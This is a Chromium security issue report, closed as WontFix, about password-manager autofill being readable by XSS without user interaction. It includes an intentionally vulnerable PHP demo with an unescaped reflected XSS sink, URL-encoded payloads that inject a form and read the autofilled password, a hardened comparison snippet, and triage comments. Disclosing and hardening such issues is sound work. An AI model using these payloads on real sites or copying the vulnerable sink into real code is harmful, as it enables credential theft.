Starred by 3 users

Issue metadata

Status: WontFix
Owner: ----
Closed: Jan 2017
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security


Security: User Password Leakage from Password Manager by XSS without User Interaction

Reported by, Jan 17 2017

Issue description

It seems Chrome prohibits getting the user's password from the password manager by XSS. When a malicious script tries to read a password field, it returns a blank value even if the field looks filled by the password manager. After a user operation, such as a key press or a click on any HTML element, the script can get the password filled by the password manager.
However, when the user moved to the XSSed page by using JavaScript, for example by using location.href, a malicious script can get the password without any user operation.
It seems that the security restriction of the password manager is bypassed.
And I think this should be fixed because it is similar to below:

Chrome Version: 55.0.2883.87 m
Operating System: Windows7 SP1 and OS X 10.11.6

I put a demonstration on my server:

Source of this php is below:
<?php
// Demo page as posted (intentionally vulnerable). The PHP tags, the else branch
// and the </form>/<script> tags were not in the post and are reconstructed here;
// $_GET{...} curly-brace access is replaced by [...] because PHP 8 removed it.
if(!isset($_GET["xss"]) && !isset($_POST["pass"])) { ?>
Please submit id/pass to use password manager.
<form action="?" method="post">
<input name="id"><br>
<input type="password" name="pass">(use dummy password)<br>
<input type="submit">
</form>
<?php } else { ?>
Please click below to fire XSS.<br>
<a href="?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec.cgi%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=login_id%3E%3Cinput%20type=password%20name=password%3E%27%3bi=setInterval(function(){p=document.forms[0].password.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27">a tag (does not work without user operation)</a><br>
<a href="#" onclick="location.href='?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec.cgi%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=login_id%3E%3Cinput%20type=password%20name=password%3E%27%3bi=setInterval(function(){p=document.forms[0].password.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27'">location.href (works without user operation)</a>
<?php } ?>
<script>
  // Reflected XSS sink: the xss parameter is echoed unescaped into a JS string literal.
  var a='<?php echo $_GET["xss"] ?? "" ?>';
</script>

Best regards,
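For comparison, an added example (not the reporter's demo and not Chromium code) showing the sink in the demo page hardened so the xss parameter can no longer break out of the string literal, plus a CSP that blocks injected inline script and off-origin form submission:

```php
<?php
// Added example: hardened form of the demo sink. Request input is never spliced
// into a JS string literal by hand; json_encode with the HEX flags emits a literal
// in which quotes, <, >, & and non-ASCII are \uXXXX-escaped, so ';alert(1) becomes
// "\u0027;alert(1)" and cannot close the literal or the <script> element.
$xss = $_GET["xss"] ?? "";
$js_literal = json_encode($xss, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT)
    ?: '""';   // json_encode returns false on invalid UTF-8; fall back to an empty literal

// Defence in depth: a per-response nonce CSP means script the page did not emit
// itself does not run, and form-action 'self' stops an injected form (the vector
// the triager describes) from posting autofilled credentials to another origin.
$nonce = base64_encode(random_bytes(16));
header("Content-Security-Policy: script-src 'nonce-$nonce'; form-action 'self'");
?>
<script nonce="<?php echo htmlspecialchars($nonce, ENT_QUOTES, 'UTF-8'); ?>">
  var a = <?php echo $js_literal; ?>;
</script>
```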
Components: UI>Browser>Passwords
>It seems Chrome prohibits getting the user's password from the password manager by XSS.

I'm not aware of any attempt to prevent reading of an autofilled password field from JavaScript, but even if there were such a feature, it couldn't be effective. An attacker could easily use script to modify the form target and submit it, leaking the credentials.

This is similar to Issue 659953; XSS attacks are inherently powerful, and theft of credentials is but one consequence of that.
Status: WontFix (was: Unconfirmed)

Comment 3 by, Jan 18 2017

Thank you for your confirmation. I understand this is by design.
I think that Chrome users who use the password manager must know this risk. Could you please change the permission of this ticket from Restrict to Public?
Labels: -Restrict-View-SecurityTeam allpublic
> I'm not aware of any attempt to prevent reading of an autofilled 
> password field from JavaScript

I was mistaken. This does exist, but it's trivially circumvented. The class in question is PasswordValueGatekeeper, found in password_autofill_agent.h.

The remainder of the remark is correct, however (this isn't intended or effective as a mitigation against XSS).
Issue 726309 has been merged into this issue.
